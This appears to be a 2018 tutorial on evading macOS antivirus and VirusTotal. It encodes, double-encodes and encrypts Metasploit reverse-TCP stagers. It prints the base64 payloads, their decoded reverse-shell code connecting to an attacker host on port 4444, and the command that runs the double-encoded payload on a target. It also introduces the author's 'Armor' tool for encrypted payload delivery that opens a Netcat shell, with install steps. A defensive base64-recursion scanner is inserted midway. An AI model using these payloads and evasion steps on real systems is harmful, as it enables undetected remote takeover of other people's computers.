Nov 14, 2018

How to Create an Undetectable Payload – Hack macOS Like Pro

Encrypting payloads and encoding stagers are more effective against macOS than one might think. Plus, it’s very easy to evade VirusTotal and macOS antivirus software using a few simple tricks.

The goal of this project was to locate a known and easily detectable macOS payload, then find a method that allowed that very same payload to execute on the target MacBook. This would reliably confirm if any discovered evasion method was effective at executing known payloads. In addition to testing malicious files against VirusTotal, they were tested in macOS Mojave (v10.14) against popular antivirus software such as Avast, AVG, BitDefender, Sophos, and ClamXAV.

Readers shouldn’t confuse this subject matter with bypassing Gatekeeper or System Integrity Protection (SIP). Executing an unsigned application and evading virus scanners are two different topics. The focus of this article will be on evading the detection of antivirus software and VirusTotal. As we’ll see below, in most cases, simply encoding a payload is enough to get around antivirus detection.

Base64 Encoding Basics

Encoding, as an antivirus evasion technique, is (generally) a very terrible idea as it’s easily decoded and identified. However, encoding Python and Bash scripts is common practice in projects like Empire and msfvenom. (If you are not familiar with MSF and Empire, go and Google them first.) It allows coders to execute complex scripts without worrying about escaping special characters which might cause a payload to break or fail.

Let’s talk about base64 encoding for a minute and consider the below strings.

echo 'one' | base64
b25lCg==

echo 'one two' | base64
b25lIHR3bwo=

echo 'one two three' | base64
b25lIHR3byB0aHJlZQo=

echo 'one two three four' | base64
b25lIHR3byB0aHJlZSBmb3VyCg==

echo 'one two three four five' | base64
b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK

All of the strings can be easily decoded (-d in Kali, -D in macOS) using the below command.

base64 -d <<< 'b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK'

Notice the end of the strings change subtly, while the beginning always appears the same. The same is true for most msfvenom payloads. If only the IP address and port number are changed, the beginning of the produced base64 encoded payloads will always be the same for every hacker and pentester using msfvenom. Below is an example created by msfvenom using the IP address “10.42.0.1.”

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=

The below msfvenom output uses the same payload but with a different IP address of “192.168.0.2.”

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==

No matter what IP and port are used, the first 142 characters are always identical when using this msfvenom payload. If not decoded and analyzed for nefarious code, it would at least seem reasonable for antivirus software to detect common base64 strings — but they don’t.

Single Base64 Encoded Payloads

Believe it or not, finding a malicious file that VirusTotal and antivirus could detect was a challenge. Executing the below command produced the following output.

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=4444

[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
Payload size: 446 bytes
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

This is a base64 encoded Python one-liner designed to interact with Metasploit. Saving the one-liner to a file called “thisfileisevil.py” and uploading it to VirusTotal resulted in a 4/58 detection rate.

This detection rate is surprisingly low. Decoding the embedded base64 string clearly reveals the Python script is designed to connect to a remote server (10.42.0.1) on port 4444.

base64 -d <<< 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('10.42.0.1',4444))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(d,{'s':s})

Saving the above decoded Python code to a file called “thisfileisevil_without_encoding.py” and uploading it to VirusTotal resulted in a 1/56 detection rate.

Double Base64 Encoded Payloads

If a common encoded payload is capable of evading most antivirus software, double-encoding it should be an effective technique too, right? Well, not quite. Encoding the encoded msfvenom output and uploading it to VirusTotal resulted in the following 1/54 detection.

Again, 1/54 detection by Microsoft, which doesn’t help any macOS using antivirus software. This was accomplished by first encoding the msfvenom output — the very same msfvenom payload that was previously detected.

cat thisfileisevil.py | base64

aW1wb3J0IGJhc2U2NCxzeXM7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHsyOnN0ciwzOmxhbWJkYSBi
OmJ5dGVzKGIsJ1VURi04Jyl9W3N5cy52ZXJzaW9uX2luZm9bMF1dKCdhVzF3YjNKMElITnZZMnRs
ZEN4emRISjFZM1FzZEdsdFpRcG1iM0lnZUNCcGJpQnlZVzVuWlNneE1DazZDZ2wwY25rNkNna0pj
ejF6YjJOclpYUXVjMjlqYTJWMEtESXNjMjlqYTJWMExsTlBRMHRmVTFSU1JVRk5LUW9KQ1hNdVky
OXVibVZqZENnb0p6RXdMalF5TGpBdU1TY3NORFEwTkNrcENna0pZbkpsWVdzS0NXVjRZMlZ3ZERv
S0NRbDBhVzFsTG5Oc1pXVndLRFVwQ213OWMzUnlkV04wTG5WdWNHRmpheWduUGtrbkxITXVjbVZq
ZGlnMEtTbGJNRjBLWkQxekxuSmxZM1lvYkNrS2QyaHBiR1VnYkdWdUtHUXBQR3c2Q2dsa0t6MXpM
bkpsWTNZb2JDMXNaVzRvWkNrcENtVjRaV01vWkN4N0ozTW5Pbk45S1FvPScpKSkK

It can be executed in the target MacBook with the following command.

python -c "$(printf '%s' 'ENCODED-PAYLOAD-HERE' | base64 -D)"

Here, printf and base64 are used on the MacBook to decode (-D) the string, and Python immediately executes the result (-c), which in turn decodes the inner payload and creates the reverse TCP connection.

To my surprise, both VirusTotal and popular antivirus software are evaded this way. Not one of the tested antivirus products was able to detect a double-encoded payload in the form of a text file or an AppleScript.
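Two observations above can be checked in code rather than by eye: the Base64 Encoding Basics section says the encoded msfvenom stager shares a long identical prefix whichever LHOST is used, and this section shows that one extra base64 layer is enough to hide it from a scanner that decodes only once. The scanner below is an added example written for this article from a detection standpoint; it is not code from the article, from msfvenom or from any antivirus product. It reuses the two encoded stagers quoted above (10.42.0.1 and 192.168.0.2) as constants, takes its signatures from the decoded stager printed above, builds the one-liner from the msfvenom output shown earlier, and constructs the double-encoded sample by re-encoding that one-liner the same way `cat thisfileisevil.py | base64` does (76-column wrapped). Recursing into every decoded layer up to a depth limit is what lets the scanner reach the inner payload; with the depth limit set to one, the double-encoded sample only reveals the outer wrapper.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# The two msfvenom outputs quoted in the article (LHOST 10.42.0.1 and 192.168.0.2).
PAYLOAD_A = ("aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=")
PAYLOAD_B = ("aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==")

# The single-encoded one-liner exactly as msfvenom printed it in the article,
# rebuilt around PAYLOAD_A (constructed here, not copied from a fresh run).
ONE_LINER = ("import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}"
             "[sys.version_info[0]]('" + PAYLOAD_A + "')))")

# Constructed sample: the one-liner re-encoded the way `cat thisfileisevil.py | base64`
# does (trailing newline, 76-column line wrapping).
DOUBLE_ENCODED = base64.encodebytes((ONE_LINER + "\n").encode()).decode()

# A base64 "blob": runs of base64 alphabet characters that may be wrapped across
# lines, with optional padding. Runs shorter than 16 characters are ignored to
# avoid treating ordinary words as base64 (a very short final wrapped line would
# be dropped too, which is the trade-off of this simple extractor).
BLOB_RE = re.compile(r"(?:[A-Za-z0-9+/]{16,}\r?\n?)+={0,2}")

# Plaintext fragments of the stager as decoded in the article; any one of them
# appearing at any decoding depth is treated as a hit.
SIGNATURES = (
    "import socket,struct,time",
    "exec(d,{'s':s})",
    "import base64,sys;exec(base64.b64decode(",
)


def shared_prefix_len(a: str, b: str) -> int:
    """Number of leading characters two strings have in common. Base64 works on
    3-byte groups, so two payloads that first differ at plaintext byte i share at
    least (i // 3) * 4 encoded characters: everything before the LHOST string."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def decode_blob(token: str) -> Optional[str]:
    """Decode one extracted blob to text; None if it is not valid base64 or not UTF-8."""
    compact = re.sub(r"\s+", "", token)          # undo 76-column wrapping
    compact += "=" * (-len(compact) % 4)         # tolerate stripped padding
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan(text: str, max_depth: int = 4) -> List[Tuple[int, str]]:
    """Return (depth, signature) hits for `text`, recursing into every decodable
    base64 blob so that double (or deeper) encoding does not hide the stager."""
    hits: List[Tuple[int, str]] = []
    _scan(text, 0, max_depth, hits)
    return hits


def _scan(text: str, depth: int, max_depth: int, hits: List[Tuple[int, str]]) -> None:
    for sig in SIGNATURES:
        if sig in text:
            hits.append((depth, sig))
    if depth >= max_depth:                        # depth limit bounds the recursion
        return
    for match in BLOB_RE.finditer(text):
        decoded = decode_blob(match.group(0))
        if decoded is not None:
            _scan(decoded, depth + 1, max_depth, hits)


if __name__ == "__main__":
    print("shared base64 prefix of the two stagers:",
          shared_prefix_len(PAYLOAD_A, PAYLOAD_B), "characters")
    for label, sample in (("one-liner", ONE_LINER), ("double-encoded", DOUBLE_ENCODED)):
        for depth, sig in scan(sample):
            print(f"{label}: hit at decoding depth {depth}: {sig!r}")
```

Running the module prints the exact length of the shared prefix and, for each sample, the depth at which each signature was found. The depth at which the inner stager surfaces is the number of base64 layers wrapped around it, which is exactly what a single-pass scanner misses.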

Encrypted Payloads

So far, we’ve learned encoding and double-encoding payloads will evade the detection of most antivirus software (although, using raw code is better). Still, encoding scripts and payloads encourages a cat and mouse game between hackers and antivirus developers. It’s only a matter of time before someone at AVG or Avast discovers this Null Byte article and antivirus scanners start recursively decoding base64 strings and looking for common encoded signatures.

This got me thinking about a more reliable method for defeating macOS antivirus; a solution that’s a bit more difficult to detect and prevent. Encrypting the payload, in addition to encoding it, will provide a better solution to evade antivirus scanners.

Why Is Encrypting Better Than Encoding?

The primary downside to encoding is antivirus software’s ability to continuously decode base64 strings and easily discover the embedded payload. No matter how many times an attacker encodes their payload, it can be reverse engineered. By encrypting the payload, antivirus software will ultimately find a string of unreadable data. The encrypted payload can’t be scanned by AV software or read by humans — not without knowing the decryption key.

Which brings me to Armor, a simple shell script I created to illustrate how encrypting macOS payloads can be automated and executed.

How the ‘Armor’ Script Works

Armor will encrypt the contents of any file it’s given. The file can contain a one-liner, a complex Python script with hundreds of lines of code, or a post-exploitation script written in any programming language supported by macOS. The file contents are encrypted with a one-time key. The key is then temporarily hosted on the attacker’s server and downloaded by the target MacBook to decrypt the payload.

Below is an example of Armor being used with a simple Netcat payload.

There are a few things happening in this GIF. I’ll explain each step in order.

1. A Netcat listener is started on port 4444.
2. The “payload.txt” file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook and the attacker’s Netcat listener.
3. Armor is used to encrypt the Bash one-liner.
4. Ncat is used to host the decryption key on the attacker’s server.
5. When the stager is executed on the target MacBook (not shown in the GIF), the Bash one-liner is decrypted and executed without writing any data to the hard drive.
6. Ncat immediately terminates the listener after the key has been used.
7. When the Netcat connection is established, the attacker has remote access to the target MacBook.

For a technical explanation of what the script is doing and how it executes commands without writing data to the target’s hard drive, head over to my GitHub page to view the comments. Readers interested in giving Armor a quick test run can follow along using the below steps.

Step 1: Install Armor

Armor can be found on my GitHub page and cloned using the below command.

git clone https://github.com/tokyoneon/Armor

Cloning into 'Armor'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.

Change (cd) into the newly created Armor/ directory.

cd Armor/

Then, give the armor.sh script permissions to execute.
